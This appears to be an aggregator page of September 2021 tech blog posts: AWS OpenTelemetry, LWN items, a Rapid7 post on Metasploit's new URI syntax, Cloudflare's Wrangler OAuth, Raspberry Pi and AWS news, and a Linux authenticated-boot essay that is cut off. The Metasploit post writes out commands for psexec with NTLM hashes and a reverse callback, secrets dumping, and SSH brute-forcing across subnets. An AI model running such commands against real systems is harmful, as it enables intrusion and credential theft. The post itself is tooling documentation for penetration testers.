    </dependency>
    <dependency>
      <groupId>software.amazon.awssdk</groupId>
      <artifactId>s3</artifactId>
    </dependency>
    <dependency>
      <groupId>software.amazon.awssdk</groupId>
      <artifactId>dynamodb</artifactId>
    </dependency>
    <dependency>
      <groupId>io.opentelemetry</groupId>
      <artifactId>opentelemetry-extension-annotations</artifactId>
      <version>1.5.0</version>
    </dependency>
    <dependency>
      <groupId>io.opentelemetry</groupId>
      <artifactId>opentelemetry-api</artifactId>
      <version>1.5.0</version>
    </dependency>
  </dependencies>
  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.8.1</version>
        <configuration>
          <source>8</source>
          <target>8</target>
        </configuration>
      </plugin>
      <plugin>
        <artifactId>maven-assembly-plugin</artifactId>
        <configuration>
          <archive>
            <manifest>
              <mainClass>com.example.myapp.App</mainClass>
            </manifest>
          </archive>
          <descriptorRefs>
            <descriptorRef>jar-with-dependencies</descriptorRef>
          </descriptorRefs>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>

I compile my application with these changes and run it again a few times:

$ mvn clean compile assembly:single

$ OTEL_RESOURCE_ATTRIBUTES=service.name=MyApp,service.namespace=MyTeam \
  java -javaagent:otel/aws-opentelemetry-agent.jar \
       -jar myapp/target/myapp-1.0-SNAPSHOT-jar-with-dependencies.jar

Now, let’s look at the X-Ray service map, computed using the additional information provided by those annotations.

Now I see the two methods and the other services they invoke. If there are errors or high latency, I can easily understand how the two methods are affected.

In the Traces section of the X-Ray console, I look at the Raw data for some of the traces. Because the title argument was annotated with @SpanAttribute, each trace has the value of that argument in the metadata section.

Collecting Traces from Lambda Functions
The previous steps work on premises, on EC2, and with applications running in containers. To collect traces and use auto-instrumentation with Lambda functions, you can use the AWS managed OpenTelemetry Lambda Layers (a few examples are included in the repository).

After you add the Lambda layer to your function, you can use the environment variable OPENTELEMETRY_COLLECTOR_CONFIG_FILE to pass your own configuration to the collector. More information on using AWS Distro for OpenTelemetry with AWS Lambda is available in the documentation.

Availability and Pricing
You can use AWS Distro for OpenTelemetry to get telemetry data from your application running on premises and on AWS. There are no additional costs for using AWS Distro for OpenTelemetry. Depending on your configuration, you might pay for the AWS services that are destinations for OpenTelemetry data, such as AWS X-Ray, Amazon CloudWatch, and Amazon Managed Service for Prometheus (AMP).

To learn more, you are invited to this webinar on Thursday, October 7 at 10:00 am PT / 1:00 pm EDT / 7:00 pm CEST.

Simplify the instrumentation of your applications and improve their observability using AWS Distro for OpenTelemetry today.

— Danilo

[$] Improvements to GCC’s -fanalyzer option

2021-09-23

Post Syndicated from original https://lwn.net/Articles/869880/rss

For the second year in a row, the GNU Tools Cauldron (the annual gathering
of GNU toolchain developers) has been held as a dedicated track at the
online Linux Plumbers
Conference. For the 2021 event, that track started with a talk by
David Malcolm on his work with the GCC -fanalyzer option, which
provides access to a number of static-analysis features. Quite a bit has
been happening with -fanalyzer and more is on the way with the
upcoming GCC 12 release, including, possibly, a set of checks that
have already found at least one vulnerability in the kernel.

The Colosseum: Triumph and Decline of the World’s Greatest Amphitheatre

2021-09-23 Geographics

Post Syndicated from Geographics original https://www.youtube.com/watch?v=OBIUYGd9zD0

Security updates for Thursday

2021-09-23

Post Syndicated from original https://lwn.net/Articles/870190/rss

Security updates have been issued by Debian (ruby-kaminari and tomcat8), Mageia (389-ds-base, ansible, apache, apr, cpio, curl, firefox, ghostscript, gifsicle, gpac, libarchive, libgd, libssh, lynx, nextcloud-client, openssl, postgresql, proftpd, python3, thunderbird, tor, and vim), openSUSE (chromium, ffmpeg, grilo, hivex, linuxptp, and samba), Oracle (go-toolset:ol8, kernel, kernel-container, krb5, mysql:8.0, and nodejs:12), SUSE (ffmpeg, firefox, grilo, hivex, kernel, linuxptp, nodejs14, and samba), and Ubuntu (ca-certificates, edk2, sqlparse, and webkit2gtk).

Easier URI Targeting With Metasploit Framework

2021-09-23 Alan David Foster

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/09/23/metasploit-uri-support/

Easier URI Targeting With Metasploit Framework

Over the past year and a half, Metasploit Framework’s core engineering team in Belfast has made significant improvements to usability, discoverability, and the general quality of life for the global community of Framework users. A few of the enhancements we’ve worked on in MSF 6 include:

A handy tip command in msfconsole that delivers tips n’ tricks to users
Consolidated EternalBlue modules that removed the need for Python as a dependency, as well as automatic targeting support
AutoCheck support, which runs the check functionality of a module before its exploit capabilities are executed to ensure the module will work beforehand, as well as providing a ForceExploit advanced option that allows a user-override this functionality
A debug command in msfconsole that provides data to help users understand the root cause of issues
Improved cross-platform support for msfdb, as well as supporting external databases — such as using a PostgreSQL Docker container
User experience improvements, including word-wrapping tables, highlighting matched search terms in the search table, and introducing context-aware hints — such as letting users know that they can use the use command to easily select a searched module
Reducing msfconsole’s boot time, as well as reducing the time required to search for modules, and list exploits/payloads in both the console and module.search RPC calls

Today’s blog looks at another series of improvements that have overhauled Framework’s option support to allow for streamlined workflows when specifying multiple module options for protocols like HTTP, MySQL, PostgreSQL, SMB, SSH, and more. This removes the need to individually call set for each module option value before running it — courtesy of pull request #15253.

Overview

Traditional usage of Metasploit involves loading a module and setting multiple options:

use exploit/linux/postgres/postgres_payload

set username administrator

set password pass

set rhost 192.168.123.6

set rport 5432

set database postgres

set lhost 192.168.123.1

set lport 5000

run

You could also specify multiple RHOSTS separated by spaces, or with a CIDR subnet mask:

set rhosts 127.0.0.1 127.0.0.2

set rhosts 127.0.0.1/24

URI support for RHOSTS

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload

run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters.

SMB examples

There’s a full page of documentation and examples in the Metasploit Wiki, but here are a few highlights that show the improvements.

Running psexec against a target host:

use exploit/windows/smb/psexec

run smb://user:[email protected] lhost=192.168.123.1 lport=5000

run “smb://user:pass with [email protected]” lhost=192.168.123.1 lport=5000

Running psexec with NTLM hashes:

use exploit/windows/smb/psexec

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000

Dumping secrets with NTLM hashes:

use auxiliary/gather/windows_secrets_dump

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]

Downloading a file:

use auxiliary/admin/smb/download_file

run smb://a:[email protected]/my_share/helloworld.txt

Uploading a file:

use auxiliary/admin/smb/upload_file

echo “my file” > local_file.txt

run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt

SSH examples

If you have valid SSH credentials, the ssh_login module will open a Metasploit session for you:

use scanner/ssh/ssh_login

run ssh://user:[email protected]

Brute-force host with known user and password list:

use scanner/ssh/ssh_login

run ssh://[email protected] threads=50 pass_file=./rockyou.txt

Brute-force credentials:

use scanner/ssh/ssh_login

run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt

Brute-force credentials in a subnet:

use scanner/ssh/ssh_login

run cidr:/24:ssh://user:[email protected] threads=50

run cidr:/24:ssh://[email protected] threads=50 pass_file=./rockyou.txt

It’s also now possible to port forward through a Metasploit SSH session:

route add 172.18.103.0/24 ssh_session_id

More examples

Full details and examples can be found within the Metasploit Wiki. At the time of release, the following protocols are now supported:

cidr – Can be combined with other protocols to specify address subnet mask
length
file – Load a series of RHOST values separated by newlines from a file (this file can also include URI strings)
http
https
mysql
postgres
smb
ssh

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

ROT8000

2021-09-23 Bruce Schneier

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/09/rot8000.html

ROT8000 is the Unicode equivalent of ROT13. What’s clever about it is that normal English looks like Chinese, and not like ciphertext (to a typical Westerner, that is).

Bringing OAuth 2.0 to Wrangler

2021-09-23 Mengqi Chen

Post Syndicated from Mengqi Chen original https://blog.cloudflare.com/wrangler-oauth/

Bringing OAuth 2.0 to Wrangler

Over the course of this summer, I had the incredible opportunity to join the Workers Developer Productivity team and help improve the developer experience of Workers. Today, I’ll talk about my project to implement the OAuth 2.0 login protocol for Wrangler, the Workers command line interface (CLI).

Wrangler needs to be authorized in order to carry out its job. API tokens are one way to authorize Wrangler, but they do not provide the best user experience as the user needs to manually copy and paste their tokens. This is where the OAuth 2.0 protocol comes into play.

Previously, the wrangler login command used API tokens to authenticate Wrangler. However, managing API tokens can sometimes be cumbersome, since you need to go to the Cloudflare dashboard to create or modify a token. By using OAuth 2.0, we can allow users to directly choose permissions or scopes from Wrangler. OAuth 2.0 helps simplify the login process while making it more secure.

OAuth 2.0 is an industry-standard protocol for allowing users to authorize applications without having to share a password. In order to understand this protocol, we need to define some terminology:

Resource Owner: an entity capable of granting access to a protected resource. This is the user.
Resource Server: the server hosting the protected resource. This is the Cloudflare API.
Client: an application making protected resource requests on behalf of the resource owner and with its authorization. This is Wrangler, making API calls on the behalf of the user.
Authorization Server: The server issuing access tokens to the client after successfully authenticating the resource owner and obtaining authorization. This is our OAuth 2.0 service provider.

The protocol has several flows, but they all share the same objective. The resource owner needs to explicitly grant permission to the client, which can then receive an access token from the authorization server. With this access token, the client is authorized to access protected resources stored on the resource server.

Authorization Code Flow

Among the different types of flows that make up the OAuth 2.0 protocol, Wrangler implements the Authorization Code Flow with PKCE challenges. Let’s take a look at what this entails!

When running wrangler login, the user is first prompted to log in to the Cloudflare dashboard. Once they are logged in, they are redirected to an authorization page, where they can decide to grant or deny authorization to Wrangler. If authorization is granted, Wrangler receives an authorization grant from the OAuth service provider. Once received, Wrangler exchanges the authorization grant for an access token and a refresh token. At this point, Wrangler stores both of these tokens on disk and uses the access token to make authorized API calls. Since the access token is short-lived, refresh tokens are used to update an expired access token. Throughout this flow, Wrangler and the OAuth service provider also use additional measures to verify the identity of each other, as later described in the Security section of this blog.

Use what you need, only when you need it

In addition to providing a smoother developer experience, the new wrangler login also allows a user to specify which scopes they need. For example, if you would like to have an OAuth token with just account and user read permissions, you can do so by running:

wrangler login --scopes account:read user:read

For more information about the currently available scopes, you can run wrangler login --scopes-list or visit the Wrangler login documentation.

Revoke access at any time

The OAuth 2.0 protocol also defines a flow to revoke authorization from Wrangler. In this workflow, a user can deny Wrangler access to protected resources by simply using the command wrangler logout. This command will make a request to the OAuth 2.0 service provider and invalidate the refresh token, which will automatically invalidate the associated access token.

Security

The OAuth integration also brings improved security by using Cross-Site Request Forgery (CSRF) states, Proof Key for Code Exchange (PKCE) challenges, and short-lived access tokens.

Throughout the first part of the wrangler login flow, Wrangler needs to request an authorization grant. In order to avoid the possibility of a forged response, Wrangler includes a CSRF state in the parameters of the authorization code request. The CSRF state is a unique randomly generated value, which is used to confirm the response received from the OAuth service provider. In addition to the CSRF state, Wrangler will also include a PKCE code_challenge. This code_challenge will be used by the OAuth service provider to verify that Wrangler is the same application when exchanging the authorization grant for an access token. The PKCE challenge is a protection against stolen authorization grants. As the OAuth service provider will reject access token requests if it cannot verify the PKCE code_challenge.

The final way the new OAuth workflow improves security is by making access tokens short-lived. In this sense, if an access token gets stolen, how can we notify the resource server that the access token should not be trusted? Well, we can’t really. So, there are three options: 1) wait until the expiration time; 2) use the refresh token to get a new access token, which invalidates the previous access token; or 3) invalidate both refresh and access tokens. This provides us with three ways to protect resources from bad actors with stolen access tokens.

What’s next

OAuth 2.0 integration is now available in the 1.19.3 version release of Wrangler. Try it out and let us know your experience. If you prefer the API tokens or global API keys, no worries. You can still access them using the wrangler config command.

I would also like to thank the Workers team and other Cloudflare teams for the incredible internship experience. This opportunity gave me a glimpse into what industry software development looks like, and the opportunity to dive deep into a meaningful project. I enjoyed the responsiveness and teamwork during the internship, making this a great summer.

The Official Raspberry Pi Handbook 2022

2021-09-23 Rob Zwetsloot

Post Syndicated from Rob Zwetsloot original https://www.raspberrypi.org/blog/the-official-raspberry-pi-handbook-2022/

Get the Official Raspberry Pi Handbook 2022 right now! Over 200 pages of Raspberry Pi projects, tutorials, tips, and reviews.

Hey folks, Rob from The MagPi here. It’s been a while! I hope you’re doing well.

We’ve been on double duty this month. As well as making an amazing new issue of The MagPi (out next week), we’ve also put together a brand new book: the Official Raspberry Pi Handbook 2022, which is on sale now!

Packed with projects

The new Handbook is crammed full of incredible community projects, some of our best build guides, an introduction to Raspberry Pi Pico, and reviews of cool Raspberry Pi kits and accessories – all stuffed into 200 pages. Here are some highlights from the book:

Lunchbox Arcade Game – make lunchtime far more exciting by busting out some Street Fighter II and having someone eat your hadoukens. Make sure to eat between rounds for maximum satisfaction.

We Still Fax – one part escape room, one part performance theatre, this relic of office technology has been hacked with a Raspberry Pi to be the centrepiece of a special show in your own living room.

iPod Classic Spotify Player – using a Raspberry Pi Zero W, this old-school iPod has been upgraded with Spotify access. The interface has even been recreated to work the same way as the old iPod, scroll wheel and all.

Play classic console games legally on Raspberry Pi – there are a surprising number of ways to get legal ROMs for Raspberry Pi-powered consoles, as well as a plethora of modern games made for the older hardware.

Build the ultimate media centre – get TV, movies, games, streaming, music, and more on one incredible Raspberry Pi build. It looks good too, thanks to the excellent case.

Stellina – this automated telescope is powered by Raspberry Pi and connects to a tablet to look at planets and other distant celestial objects.

… And much, much more!

Where can I buy it?

You can grab the Official Raspberry Pi Handbook 2022 from our online store, the Raspberry Pi Store in Cambridge, from our Android and iOS app, and in the real world at some newsagents. It will make an excellent stocking stuffer in a few months time. You can also get the PDF free from our website.

Until next time, take care of yourselves!

The post The Official Raspberry Pi Handbook 2022 appeared first on Raspberry Pi.

[$] LWN.net Weekly Edition for September 23, 2021

2021-09-23

Post Syndicated from original https://lwn.net/Articles/869381/rss

The LWN.net Weekly Edition for September 23, 2021 is available.

Podcast Taping: "How To Build a Happy Life"

2021-09-23 The Atlantic

Post Syndicated from The Atlantic original https://www.youtube.com/watch?v=_OsICXZ4lTY

In the Works – AWS Region in New Zealand

2021-09-23 Jeff Barr

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/in-the-works-aws-region-in-new-zealand/

We are currently working on regions in Australia, India, Indonesia, Israel, Spain , Switzerland, and the United Arab Emirates.

Auckland, New Zealand in the Works
Today I am happy to announce that the new AWS Asia Pacific (Auckland) Region is in the works and will open in 2024. This region will have three Availability Zones and will give AWS customers in New Zealand the ability to run workloads and store data that must remain in-country.

There are 81 Availability Zones within 25 AWS Regions in operation today, with 24 more Availability Zones and eight announced regions (including this one) underway.

Each of the Availability Zones will be physically independent of the others in region, close enough to support applications that need low latency, yet sufficiently distant to significantly reduce the risk that an AZ-level event will have an impact on business continuity. The AZs in this region will be connected together via high-bandwidth, low-latency network connections over dedicated, fully redundant fiber. This connectivity supports applications that need synchronous replication between AZs for availability or redundancy; you can take a peek at the AWS Global Infrastructure page to learn more about how we design and build regions and AZs.

AWS in New Zealand
According to an economic impact study (EIS) that we released as part of this launch, we estimate that our NZ$ 7.5 billion (5.3 billion USD) investment will create 1,000 new jobs and will have an estimated economic impact of NZ$ 10.8 billion (7.7 billion USD) over the next fifteen years.

The first AWS office in New Zealand opened in 2013 and now employs over 100 solution architects, account managers, sales representatives, professional services consultants, and cloud experts.

Other AWS infrastructure includes a pair of Amazon CloudFront edge locations in Auckland along with access to the AWS global backbone through multiple, redundant submarine cables. For more information about connectivity options, be sure to check out New Zealand Internet Connectivity to AWS.

Stay Tuned
We’ll announce the opening of this and the other regions in future blog posts, so be sure to stay tuned!

— Jeff;

PS – The Amazon Polly Aria voice (New Zealand English) was launched earlier this year and should be of interest to New Zealanders. Visit the Amazon Polly Console to get started!

Authenticated Boot and Disk Encryption on Linux

2021-09-23

Post Syndicated from original http://0pointer.net/blog/authenticated-boot-and-disk-encryption-on-linux.html

The Strange State of Authenticated Boot and Disk Encryption on Generic Linux Distributions

TL;DR: Linux has been supporting Full Disk Encryption (FDE) and
technologies such as UEFI SecureBoot and TPMs for a long
time. However, the way they are set up by most distributions is not as
secure as they should be, and in some ways quite frankly weird. In
fact, right now, your data is probably more secure if stored on
current ChromeOS, Android, Windows or MacOS devices, than it is on
typical Linux distributions.

Generic Linux distributions (i.e. Debian, Fedora, Ubuntu, …) adopted
Full Disk Encryption (FDE) more than 15 years ago, with the
LUKS/cryptsetup infrastructure. It was a big step forward to a more
secure environment. Almost ten years ago the big distributions started
adding UEFI SecureBoot to their boot process. Support for Trusted
Platform Modules (TPMs) has been added to the distributions a long
time ago as well — but even though many PCs/laptops these days have
TPM chips on-board it’s generally not used in the default setup of
generic Linux distributions.

How these technologies currently fit together on generic Linux
distributions doesn’t really make too much sense to me — and falls
short of what they could actually deliver. In this story I’d like to
have a closer look at why I think that, and what I propose to do about
it.

The Basic Technologies

Let’s have a closer look what these technologies actually deliver:

LUKS/dm-crypt/cryptsetup provide disk encryption, and optionally
data authentication. Disk encryption means that reading the data in
clear-text form is only possible if you possess a secret of some
form, usually a password/passphrase. Data authentication means that
no one can make changes to the data on disk unless they possess a
secret of some form. Most distributions only enable the former
though — the latter is a more recent addition to LUKS/cryptsetup,
and is not used by default on most distributions (though it
probably should be). Closely related to LUKS/dm-crypt is
dm-verity (which can authenticate immutable volumes) and
dm-integrity (which can authenticate writable volumes, among
other things).
UEFI SecureBoot provides mechanisms for authenticating boot loaders
and other pre-OS binaries before they are invoked. If those boot
loaders then authenticate the next step of booting in a similar
fashion there’s a chain of trust which can ensure that only code
that has some level of trust associated with it will run on the
system. Authentication of boot loaders is done via cryptographic
signatures: the OS/boot loader vendors cryptographically sign their
boot loader binaries. The cryptographic certificates that may be
used to validate these signatures are then signed by Microsoft, and
since Microsoft’s certificates are basically built into all of
today’s PCs and laptops this will provide some basic trust chain:
if you want to modify the boot loader of a system you must have
access to the private key used to sign the code (or to the private
keys further up the certificate chain).
TPMs do many things. For this text we’ll focus one facet: they can
be used to protect secrets (for example for use in disk encryption,
see above), that are released only if the code that booted the host
can be authenticated in some form. This works roughly like this:
every component that is used during the boot process (i.e. code,
certificates, configuration, …) is hashed with a cryptographic hash
function before it is used. The resulting hash is written to some
small volatile memory the TPM maintains that is write-only (the so
called Platform Configuration Registers, “PCRs”): each step of the
boot process will write hashes of the resources needed by the next
part of the boot process into these PCRs. The PCRs cannot be
written freely: the hashes written are combined with what is
already stored in the PCRs — also through hashing and the result of
that then replaces the previous value. Effectively this means: only
if every component involved in the boot matches expectations the
hash values exposed in the TPM PCRs match the expected values
too. And if you then use those values to unlock the secrets you
want to protect you can guarantee that the key is only released to
the OS if the expected OS and configuration is booted. The process
of hashing the components of the boot process and writing that to
the TPM PCRs is called “measuring”. What’s also important to
mention is that the secrets are not only protected by these PCR
values but encrypted with a “seed key” that is generated on the TPM
chip itself, and cannot leave the TPM (at least so goes the
theory). The idea is that you cannot read out a TPM’s seed key, and
thus you cannot duplicate the chip: unless you possess the
original, physical chip you cannot retrieve the secret it might be
able to unlock for you. Finally, TPMs can enforce a limit on unlock
attempts per time (“anti-hammering”): this makes it hard to brute
force things: if you can only execute a certain number of unlock
attempts within some specific time then brute forcing will be
prohibitively slow.

How Linux Distributions use these Technologies

As mentioned already, Linux distributions adopted the first two
of these technologies widely, the third one not so much.

So typically, here’s how the boot process of Linux distributions works
these days:

The UEFI firmware invokes a piece of code called “shim” (which is
stored in the EFI System Partition — the “ESP” — of your system),
that more or less is just a list of certificates compiled into code
form. The shim is signed with the aforementioned Microsoft key,
that is built into all PCs/laptops. This list of certificates then
can be used to validate the next step of the boot process. The shim
is measured by the firmware into the TPM. (Well, the shim can do a
bit more than what I describe here, but this is outside of the
focus of this article.)
The shim then invokes a boot loader (often Grub) that is signed by
a private key owned by the distribution vendor. The boot loader is
stored in the ESP as well, plus some other places (i.e. possibly a
separate boot partition). The corresponding certificate is included
in the list of certificates built into the shim. The boot loader
components are also measured into the TPM.
The boot loader then invokes the kernel and passes it an initial
RAM disk image (initrd), which contains initial userspace code. The
kernel itself is signed by the distribution vendor too. It’s also
validated via the shim. The initrd is not validated, though
(!). The kernel is measured into the TPM, the initrd sometimes too.
The kernel unpacks the initrd image, and invokes what is contained
in it. Typically, the initrd then asks the user for a password for
the encrypted root file system. The initrd then uses that to set up
the encrypted volume. No code authentication or TPM measurements
take place.
The initrd then transitions into the root file system. No code
authentication or TPM measurements take place.
When the OS itself is up the user is prompted for their user name,
and their password. If correct, this will unlock the user account:
the system is now ready to use. At this point no code
authentication, no TPM measurements take place. Moreover, the
user’s password is not used to unlock any data, it’s used only to
allow or deny the login attempt — the user’s data has already been
decrypted a long time ago, by the initrd, as mentioned above.

What you’ll notice here of course is that code validation happens for
the shim, the boot loader and the kernel, but not for the initrd or
the main OS code anymore. TPM measurements might go one step further:
the initrd is measured sometimes too, if you are lucky. Moreover, you
might notice that the disk encryption password and the user password
are inquired by code that is not validated, and is thus not safe from
external manipulation. You might also notice that even though TPM
measurements of boot loader/OS components are done nothing actually
ever makes use of the resulting PCRs in the typical setup.

Attack Scenarios

Of course, before determining whether the setup described above makes
sense or not, one should have an idea what one actually intends to
protect against.

The most basic attack scenario to focus on is probably that you want
to be reasonably sure that if someone steals your laptop that contains
all your data then this data remains confidential. The model described
above probably delivers that to some degree: the full disk encryption
when used with a reasonably strong password should make it hard for
the laptop thief to access the data. The data is as secure as the
password used is strong. The attacker might attempt to brute force the
password, thus if the password is not chosen carefully the attacker
might be successful.

Two more interesting attack scenarios go something like this:

Instead of stealing your laptop the attacker takes the harddisk
from your laptop while you aren’t watching (e.g. while you went for
a walk and left it at home or in your hotel room), makes a copy of
it, and then puts it back. You’ll never notice they did that. The
attacker then analyzes the data in their lab, maybe trying to brute
force the password. In this scenario you won’t even know that your
data is at risk, because for you nothing changed — unlike in the
basic scenario above. If the attacker manages to break your
password they have full access to the data included on it,
i.e. everything you so far stored on it, but not necessarily on
what you are going to store on it later. This scenario is worse
than the basic one mentioned above, for the simple fact that you
won’t know that you might be attacked. (This scenario could be
extended further: maybe the attacker has a chance to watch you type
in your password or so, effectively lowering the password
strength.)
Instead of stealing your laptop the attacker takes the harddisk
from your laptop while you aren’t watching, inserts backdoor code
on it, and puts it back. In this scenario you won’t know your data
is at risk, because physically everything is as before. What’s
really bad though is that the attacker gets access to anything you
do on your laptop, both the data already on it, and whatever you
will do in the future.

I think in particular this backdoor attack scenario is something we
should be concerned about. We know for a fact that attacks like that
happen all the time (Pegasus, industry espionage, …), hence we should
make them hard.

Are we Safe?

So, does the scheme so far implemented by generic Linux distributions
protect us against the latter two scenarios? Unfortunately not at
all. Because distributions set up disk encryption the way they do, and
only bind it to a user password, an attacker can easily duplicate the
disk, and then attempt to brute force your password. What’s worse:
since code authentication ends at the kernel — and the initrd is not
authenticated anymore —, backdooring is trivially easy: an attacker
can change the initrd any way they want, without having to fight any
kind of protections. And given that FDE unlocking is implemented in
the initrd, and it’s the initrd that asks for the encryption password
things are just too easy: an attacker could trivially easily insert
some code that picks up the FDE password as you type it in and send it
wherever they want. And not just that: since once they are in they are
in, they can do anything they like for the rest of the system’s
lifecycle, with full privileges — including installing backdoors for
versions of the OS or kernel that are installed on the device in the
future, so that their backdoor remains open for as long as they like.

That is sad of course. It’s particular sad given that the other
popular OSes all address this much better. ChromeOS, Android, Windows
and MacOS all have way better built-in protections against attacks
like this. And it’s why one can certainly claim that your data is
probably better protected right now if you store it on those OSes then
it is on generic Linux distributions.

(Yeah, I know that there are some niche distros which do this better,
and some hackers hack their own. But I care about general purpose
distros here, i.e. the big ones, that most people base their work on.)

Note that there are more problems with the current setup. For example,
it’s really weird that during boot the user is queried for an FDE
password which actually protects their data, and then once the system
is up they are queried again – now asking for a username, and another
password. And the weird thing is that this second authentication that
appears to be user-focused doesn’t really protect the user’s data
anymore — at that moment the data is already unlocked and
accessible. The username/password query is supposed to be useful in
multi-user scenarios of course, but how does that make any sense,
given that these multiple users would all have to know a disk
encryption password that unlocks the whole thing during the FDE step,
and thus they have access to every user’s data anyway if they make an
offline copy of the harddisk?

Can we do better?

Of course we can, and that is what this story is actually supposed to
be about.

Let’s first figure out what the minimal issues we should fix are (at
least in my humble opinion):

The initrd must be authenticated before being booted into. (And
measured unconditionally.)
The OS binary resources (i.e. /usr/) must be authenticated before
being booted into. (But don’t need to be encrypted, since everyone
has the same anyway, there’s nothing to hide here.)
The OS configuration and state (i.e. /etc/ and /var/) must be
encrypted, and authenticated before they are used. The encryption
key should be bound to the TPM device; i.e system data should be
locked to a security concept belonging to the system, not the user.
The user’s home directory (i.e. /home/lennart/ and similar) must
be encrypted and authenticated. The unlocking key should be bound
to a user password or user security token (FIDO2 or PKCS#11 token);
i.e. user data should be locked to a security concept belonging to
the user, not the system.

Or to summarize this differently:

Every single component of the boot
process and OS needs to be authenticated, i.e. all of shim (done),
boot loader (done), kernel (done), initrd (missing so far), OS binary
resources (missing so far), OS configuration and state (missing so
far), the user’s home (missing so far).
Encryption is necessary for the OS configuration and state (bound
to TPM), and for the user’s home directory (bound to a user
password or user security token).

In Detail

Let’s see how we can achieve the above in more detail.

How to Authenticate the initrd

At the moment initrds are generated on the installed host via scripts
(dracut and similar) that try to figure out a minimal set of binaries
and configuration data to build an initrd that contains just enough to
be able to find and set up the root file system. What is included in
the initrd hence depends highly on the individual installation and its
configuration. Pretty likely no two initrds generated that way will be
fully identical due to this. This model clearly has benefits: the
initrds generated this way are very small and minimal, and support
exactly what is necessary for the system to boot, and not less or
more. It comes with serious drawbacks too though: the generation
process is fragile and sometimes more akin to black magic than
following clear rules: the generator script natively has to understand
a myriad of storage stacks to determine what needs to be included and
what not. It also means that authenticating the image is hard: given
that each individual host gets a different specialized initrd, it
means we cannot just sign the initrd with the vendor key like we sign
the kernel. If we want to keep this design we’d have to figure out
some other mechanism (e.g. a per-host signature key – that is
generated locally; or by authenticating it with a message
authentication code bound to the TPM). While these approaches are
certainly thinkable, I am not convinced they actually are a good idea
though: locally and dynamically generated per-host initrds is
something we probably should move away from.

If we move away from locally generated initrds, things become a lot
simpler. If the distribution vendor generates the initrds on their
build systems then it can be attached to the kernel image itself, and
thus be signed and measured along with the kernel image, without any
further work. This simplicity is simply lovely. Besides robustness and
reproducibility this gives us an easy route to authenticated initrds.

But of course, nothing is really that simple: working with
vendor-generated initrds means that we can’t adjust them anymore to
the specifics of the individual host: if we pre-build the initrds and
include them in the kernel image in immutable fashion then it becomes
harder to support complex, more exotic storage or to parameterize it
with local network server information, credentials, passwords, and so
on. Now, for my simple laptop use-case these things don’t matter,
there’s no need to extend/parameterize things, laptops and their
setups are not that wildly different. But what to do about the cases
where we want both: extensibility to cover for less common storage
subsystems (iscsi, LVM, multipath, drivers for exotic hardware…) and
parameterization?

Here’s a proposal how to achieve that: let’s build a basic initrd into
the kernel as suggested, but then do two things to make this scheme
both extensible and parameterizable, without compromising security.

Let’s define a way how the basic initrd can be extended with
additional files, which are stored in separate “extension
images”. The basic initrd should be able to discover these extension
images, authenticate them and then activate them, thus extending
the initrd with additional resources on-the-fly.
Let’s define a way how we can safely pass additional parameters to
the kernel/initrd (and actually the rest of the OS, too) in an
authenticated (and possibly encrypted) fashion. Parameters in this
context can be anything specific to the local installation,
i.e. server information, security credentials, certificates, SSH
server keys, or even just the root password that shall be able to
unlock the root account in the initrd …

In such a scheme we should be able to deliver everything we are
looking for:

We’ll have a full trust chain for the code: the boot loader will
authenticate and measure the kernel and basic initrd. The initrd
extension images will then be authenticated by the basic initrd
image.
We’ll have authentication for all the parameters passed to the
initrd.

This so far sounds very unspecific? Let’s make it more specific by
looking closer at the components I’d suggest to be used for this
logic:

The systemd suite since a few months contains a subsystem
implementing system extensions (v248). System extensions are
ultimately just disk images (for example a squashfs file system in
a GPT envelope) that can extend an underlying OS tree. Extending
in this regard means they simply add additional files and
directories into the OS tree, i.e. below /usr/. For a longer
explanation see
systemd-sysext(8). When
a system extension is activated it is simply mounted and then
merged into the main /usr/ tree via a read-only overlayfs
mount. Now what’s particularly nice about them in this context we
are talking about here is that the extension images may carry
dm-verity authentication data, and PKCS#7 signatures (once this
is merged, that
is, i.e. v250).
The systemd suite also contains a concept called service
“credentials”. These are small pieces of information passed to
services in a secure way. One key feature of these credentials is
that they can be encrypted and authenticated in a very simple way
with a key bound to the TPM (v250). See
LoadCredentialEncrypted=
and
systemd-creds(1)
for details. They are great for safely storing SSL private keys and
similar on your system, but they also come handy for parameterizing
initrds: an encrypted credential is just a file that can only be
decoded if the right TPM is around with the right PCR values set.
The systemd suite contains a component called
systemd-stub(7). It’s
an EFI stub, i.e. a small piece of code that is attached to a
kernel image, and turns the kernel image into a regular EFI binary
that can be directly executed by the firmware (or a boot
loader). This stub has a number of nice features (for example, it
can show a boot splash before invoking the Linux kernel itself and
such). Once this work is
merged (v250) the stub
will support one more feature: it will automatically search for
system extension image files and credential files next to the
kernel image file, measure them and pass them on to the main initrd
of the host.

Putting this together we have nice way to provide fully authenticated
kernel images, initrd images and initrd extension images; as well as
encrypted and authenticated parameters via the credentials logic.

How would a distribution actually make us of this? A distribution
vendor would pre-build the basic initrd, and glue it into the kernel
image, and sign that as a whole. Then, for each supposed extension of
the basic initrd (e.g. one for iscsi support, one for LVM, one for
multipath, …), the vendor would use a tool such as
mkosi to build an extension image,
i.e. a GPT disk image containing the files in squashfs format, a
Verity partition that authenticates it, plus a PKCS#7 signature
partition that validates the root hash for the dm-verity partition,
and that can be checked against a key provided by the boot loader or
main initrd. Then, any parameters for the initrd will be encrypted
using systemd-creds encrypt
-T. The
resulting encrypted credentials and the initrd extension images are
then simply placed next to the kernel image in the ESP (or boot
partition). Done.

This checks all boxes: everything is authenticated and measured, the
credentials also encrypted. Things remain extensible and modular, can
be pre-built by the vendor, and installation is as simple as dropping
in one file for each extension and/or credential.

How to Authenticate the Binary OS Resources

Let’s now have a look how to authenticate the Binary OS resources,
